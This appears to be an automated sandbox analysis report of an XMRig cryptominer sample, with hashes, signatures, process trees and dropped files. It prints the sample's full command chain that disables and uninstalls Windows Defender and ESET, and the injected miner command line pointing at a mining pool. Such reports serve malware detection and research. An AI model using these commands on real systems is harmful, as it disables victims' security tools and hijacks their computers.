Analysis
-
max time kernel
145s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 16:07
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe
Resource
win7-20240903-en
General
-
Target
JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe
-
Size
21.6MB
-
MD5
78d55bec3868cbfb8ddea16e43cc7d1d
-
SHA1
1d9a7975b05634d227f848c745d8ebc2f4efe269
-
SHA256
63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1
-
SHA512
87edf121b27d9411747a7111ee8f9b98a68fb1d1036e3d09a3e57079fea994fcf5e712f9fdfa9f8b323b85702ef87e30c46ddcd76c85a40108788caf3e595b12
-
SSDEEP
393216:9CTxOIMfqR6mcLk9ZSniBUPkX0Eblsdxp6/BXFiaN1ATLJ174kfD5d56sT9QW31O:9UKkXEckEtsckVd0sT/o
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral1/memory/444-105-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-104-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-101-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-99-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-97-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-95-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-93-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-91-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-89-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-87-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-85-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-144-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-143-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-141-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-142-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/444-140-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2564 powershell.exe 2136 powershell.exe 2732 powershell.exe 3028 powershell.exe 1192 powershell.exe 2220 powershell.exe 2916 powershell.exe 1576 powershell.exe 2888 powershell.exe 2644 powershell.exe 2708 powershell.exe 784 powershell.exe 2688 powershell.exe 1768 powershell.exe 2232 powershell.exe 2236 powershell.exe 464 powershell.exe 836 powershell.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Executes dropped EXE 1 IoCs
pid Process 1944 dismhost.exe -
Loads dropped DLL 33 IoCs
pid Process 2260 Dism.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe 1944 dismhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 3 pastebin.com 4 raw.githubusercontent.com 5 raw.githubusercontent.com 2 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2672 set thread context of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2452 sc.exe 1600 sc.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2564 powershell.exe 2136 powershell.exe 2732 powershell.exe 3028 powershell.exe 2888 powershell.exe 2644 powershell.exe 2708 powershell.exe 784 powershell.exe 2688 powershell.exe 464 powershell.exe 1768 powershell.exe 2232 powershell.exe 836 powershell.exe 1576 powershell.exe 1192 powershell.exe 2236 powershell.exe 2220 powershell.exe 2916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 3028 powershell.exe Token: SeDebugPrivilege 2888 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeLockMemoryPrivilege 444 explorer.exe Token: SeLockMemoryPrivilege 444 explorer.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeBackupPrivilege 2260 Dism.exe Token: SeRestorePrivilege 2260 Dism.exe Token: SeIncreaseQuotaPrivilege 1044 WMIC.exe Token: SeSecurityPrivilege 1044 WMIC.exe Token: SeTakeOwnershipPrivilege 1044 WMIC.exe Token: SeLoadDriverPrivilege 1044 WMIC.exe Token: SeSystemProfilePrivilege 1044 WMIC.exe Token: SeSystemtimePrivilege 1044 WMIC.exe Token: SeProfSingleProcessPrivilege 1044 WMIC.exe Token: SeIncBasePriorityPrivilege 1044 WMIC.exe Token: SeCreatePagefilePrivilege 1044 WMIC.exe Token: SeBackupPrivilege 1044 WMIC.exe Token: SeRestorePrivilege 1044 WMIC.exe Token: SeShutdownPrivilege 1044 WMIC.exe Token: SeDebugPrivilege 1044 WMIC.exe Token: SeSystemEnvironmentPrivilege 1044 WMIC.exe Token: SeRemoteShutdownPrivilege 1044 WMIC.exe Token: SeUndockPrivilege 1044 WMIC.exe Token: SeManageVolumePrivilege 1044 WMIC.exe Token: 33 1044 WMIC.exe Token: 34 1044 WMIC.exe Token: 35 1044 WMIC.exe Token: SeIncreaseQuotaPrivilege 1044 WMIC.exe Token: SeSecurityPrivilege 1044 WMIC.exe Token: SeTakeOwnershipPrivilege 1044 WMIC.exe Token: SeLoadDriverPrivilege 1044 WMIC.exe Token: SeSystemProfilePrivilege 1044 WMIC.exe Token: SeSystemtimePrivilege 1044 WMIC.exe Token: SeProfSingleProcessPrivilege 1044 WMIC.exe Token: SeIncBasePriorityPrivilege 1044 WMIC.exe Token: SeCreatePagefilePrivilege 1044 WMIC.exe Token: SeBackupPrivilege 1044 WMIC.exe Token: SeRestorePrivilege 1044 WMIC.exe Token: SeShutdownPrivilege 1044 WMIC.exe Token: SeDebugPrivilege 1044 WMIC.exe Token: SeSystemEnvironmentPrivilege 1044 WMIC.exe Token: SeRemoteShutdownPrivilege 1044 WMIC.exe Token: SeUndockPrivilege 1044 WMIC.exe Token: SeManageVolumePrivilege 1044 WMIC.exe Token: 33 1044 WMIC.exe Token: 34 1044 WMIC.exe Token: 35 1044 WMIC.exe Token: SeRestorePrivilege 2116 msiexec.exe Token: SeTakeOwnershipPrivilege 2116 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2672 wrote to memory of 2396 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 30 PID 2672 wrote to memory of 2396 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 30 PID 2672 wrote to memory of 2396 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 30 PID 2396 wrote to memory of 2564 2396 cmd.exe 32 PID 2396 wrote to memory of 2564 2396 cmd.exe 32 PID 2396 wrote to memory of 2564 2396 cmd.exe 32 PID 2396 wrote to memory of 2136 2396 cmd.exe 33 PID 2396 wrote to memory of 2136 2396 cmd.exe 33 PID 2396 wrote to memory of 2136 2396 cmd.exe 33 PID 2396 wrote to memory of 2732 2396 cmd.exe 34 PID 2396 wrote to memory of 2732 2396 cmd.exe 34 PID 2396 wrote to memory of 2732 2396 cmd.exe 34 PID 2396 wrote to memory of 3028 2396 cmd.exe 35 PID 2396 wrote to memory of 3028 2396 cmd.exe 35 PID 2396 wrote to memory of 3028 2396 cmd.exe 35 PID 2396 wrote to memory of 2888 2396 cmd.exe 36 PID 2396 wrote to memory of 2888 2396 cmd.exe 36 PID 2396 wrote to memory of 2888 2396 cmd.exe 36 PID 2396 wrote to memory of 2644 2396 cmd.exe 37 PID 2396 wrote to memory of 2644 2396 cmd.exe 37 PID 2396 wrote to memory of 2644 2396 cmd.exe 37 PID 2396 wrote to memory of 2708 2396 cmd.exe 38 PID 2396 wrote to memory of 2708 2396 cmd.exe 38 PID 2396 wrote to memory of 2708 2396 cmd.exe 38 PID 2396 wrote to memory of 784 2396 cmd.exe 39 PID 2396 wrote to memory of 784 2396 cmd.exe 39 PID 2396 wrote to memory of 784 2396 cmd.exe 39 PID 2396 wrote to memory of 2688 2396 cmd.exe 40 PID 2396 wrote to memory of 2688 2396 cmd.exe 40 PID 2396 wrote to memory of 2688 2396 cmd.exe 40 PID 2396 wrote to memory of 464 2396 cmd.exe 42 PID 2396 wrote to memory of 464 2396 cmd.exe 42 PID 2396 wrote to memory of 464 2396 cmd.exe 42 PID 2396 wrote to memory of 1768 2396 cmd.exe 43 PID 2396 wrote to memory of 1768 2396 cmd.exe 43 PID 2396 wrote to memory of 1768 2396 cmd.exe 43 PID 2396 wrote to memory of 2232 2396 cmd.exe 45 PID 2396 wrote to memory of 2232 2396 cmd.exe 45 PID 2396 wrote to memory of 2232 2396 cmd.exe 45 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2672 wrote to memory of 444 2672 JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe 46 PID 2396 wrote to memory of 836 2396 cmd.exe 47 PID 2396 wrote to memory of 836 2396 cmd.exe 47 PID 2396 wrote to memory of 836 2396 cmd.exe 47 PID 2396 wrote to memory of 1576 2396 cmd.exe 48 PID 2396 wrote to memory of 1576 2396 cmd.exe 48 PID 2396 wrote to memory of 1576 2396 cmd.exe 48 PID 2396 wrote to memory of 2452 2396 cmd.exe 49 PID 2396 wrote to memory of 2452 2396 cmd.exe 49 PID 2396 wrote to memory of 2452 2396 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled3⤵
- Launches sc.exe
PID:2452
-
-
C:\Windows\system32\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet3⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\8F13146E-377E-4C8F-98F4-E42884F308D7\dismhost.exeC:\Users\Admin\AppData\Local\Temp\8F13146E-377E-4C8F-98F4-E42884F308D7\dismhost.exe {6C968293-D790-4B94-B3BC-03DD87FFDFA5}4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:1944
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-stealth2⤵
- Suspicious use of AdjustPrivilegeToken
PID:444
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
179KB
MD56a4bd682396f29fd7df5ab389509b950
SHA146f502bec487bd6112f333d1ada1ec98a416d35f
SHA256328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb
SHA51235ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751
-
Filesize
109KB
MD55488e381238ff19687fdd7ab2f44cfcc
SHA1b90fa27ef6a7fc6d543ba33d5c934180e17297d3
SHA256abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0
SHA512933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412
-
Filesize
94KB
MD59a821d8d62f4c60232b856e98cba7e4f
SHA14ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5
SHA256a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525
SHA5121b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3
-
Filesize
32KB
MD5724ee7133b1822f7ff80891d773fde51
SHA1d10dff002b02c78e624bf83ae8a6f25d73761827
SHA256d13f068f42074b3104987bfed49fbf3a054be6093908ed5dea8901887dddb367
SHA5121dfd236537d6592a19b07b5e1624310c67adff9e776e6d2566b9e7db732588988f9ae7352df6c3b53c058807d8ed55fafc2004a2d6dc2f3f6c9e16445699f17b
-
Filesize
12KB
MD59085b83968e705a3be5cd7588545a955
SHA1f0a477b353ca3e20fa65dd86cb260777ff27e1dd
SHA256fe0719cf624e08b5d6695ee3887358141d11316489c4ea97d2f61a4d2b9060cd
SHA512b7f12f7ac1e6942f24f4bf35444f623cc93f8a047ebc754b9599d5df16cab4d3745729d11b4a3abfdc06a671e55ac52cac937badd808825906f52885f16f2c1c
-
Filesize
6KB
MD5f18044dec5b59c82c7f71ecffe2e89ab
SHA1731d44676a8f5b3b7ad1d402dfdbb7f08bdc40c6
SHA256a650578a4630e1a49280dc273d1d0bbdca81664a2199e5ab44ec7c5c54c0a35e
SHA51253c23acddab099508b1e01dcc0d5dc9d4da67bc1765087f4a46b9ac842de065a55bac4c6682da07f5a1d29a3d0c1d92a4310e6b0f838740d919f8285911fa714
-
Filesize
15KB
MD5ee8c06cd11b34a37579d118ac5d6fa1d
SHA1c62f7fb0c6f42321b33ea675c0dfd304b2eb4a15
SHA2566991fb4bfd6800385a32ac759dd21016421cb13dca81f04ddcaf6bf12a928ccc
SHA512091cfa7d9b80e92df13ba829372dfb211214f4221e52fbf3f558ebb7f18736ad9ad867ea0d0ddf8938def1b4db64a12d0df37c2eaf41727b997f4905dd41fed1
-
Filesize
2KB
MD5cab37f952682118bac4a3f824c80b6ac
SHA16e35b4289927e26e3c50c16cbf87eb3ac6f3b793
SHA25614bec7c4bb6cf1ee9049ef8820ec88bf78f2af75615f7a3fb265ef4b45c30e4d
SHA512de9089adaa85f37201526b8619f697be98a7d05353b21b6d835f4d56803732380316359ba8b3c8ca7c14a9bf7cf31a7eff3c866a8f303ef737eb63573e01aa19
-
Filesize
2KB
MD59bc5d6eb3e2d31bbdbffe127a1b3cdbf
SHA1b253025c442aefe338b4c7ebea2f7d808abc9618
SHA25655e9ae098def76e7388d7d069746dbd136ae243357ece23b77f2365f0b2ff76f
SHA512f9968554737d181d4b7d0366f40f0c9a2039b59796986964413fa08f031f5529411b2741eb8ea3d8c312112b2038e6a58d891d090a42672c3d1c782b859f2e08
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e8fffb6b466f61586b10bd553d47bb3a
SHA175c0be89f379a93ca1bbbf9fa0a764a879862ce8
SHA256a42d2870e24d420387b9699f80a8a9f83b17006a866eb67a4548ebc1eff67c7d
SHA5126d2a267af8f0390e6d5a8ce1571776bfeadb82e8bafd57c6ca8f9657b35cadccabba7fa885a872852986661826dee6b0228fe236699ee60dad3746e2a41af526
-
Filesize
155KB
MD5b16cf5c67abee8ca0ae23c96f3b776f8
SHA17c41964d47851073903c47515dfe23430d0a0a66
SHA2562b44eeb0584ee1ea2abbb224120d4d06613c47fe2d681a38e5907920f1b0f203
SHA512bc51052d9e58631412a6d74ffe29c5c075567e2ceb11bf6cb9d21e6800f218c6f3d18a61dfe61cc09aca2af4e4efcb6719af476569d27816c567808ecaba8084
-
Filesize
171KB
MD5b599498513e8ce262a5c17f18790e91f
SHA178ebbd9ca657b745695b34dc3636b8d2571320c5
SHA256c85c703d9d99c3025eaf541151632de1dc6d508ffa6a8516b018a8e1a5d049bd
SHA512cac5f4c3033f2a6027e08feaeeda543ab079091eb83a65d83eb44b24989d335fbb683638deeb4df8b30fb970e3842ddfd9fce515c95e1ebaf7fe6542685ae4f0
-
Filesize
744KB
MD5efcb002abc3529d71b61e6fb6434566c
SHA1a25aca0fc9a1139f44329b28dc13c526965d311f
SHA256b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd
SHA51210ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687
-
Filesize
283KB
MD5f2b0771a7cd27f20689e0ab787b7eb7c
SHA1eb56e313cd23cb77524ef0db1309aebb0b36f7ef
SHA2567c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f
SHA5125ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a
-
Filesize
182KB
MD58ca117cb9338c0351236939717cb7084
SHA1baa145810d50fdb204c8482fda5cacaaf58cdad0
SHA256f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54
SHA51235b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35
-
Filesize
425KB
MD5fc2db5842190c6e78a40cd7da483b27c
SHA1e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0
SHA256e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82
SHA512d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6
-
Filesize
52KB
MD5c9d74156913061be6c51d8fc3acf8e93
SHA14a4c6473a478256e4c78b423e918191118e01093
SHA256af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37
SHA512c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047
-
Filesize
104KB
MD562de64dc805fd98af3ada9d93209f6a9
SHA1392ba504973d626aaf5c5b41b184670c58ec65a7
SHA25683c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc
SHA5127db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28
-
Filesize
124KB
MD5e7caed467f80b29f4e63ba493614dbb1
SHA165a159bcdb68c7514e4f5b65413678c673d2d0c9
SHA2562c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c
SHA51234952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e
-
Filesize
265KB
MD57b38d7916a7cd058c16a0a6ca5077901
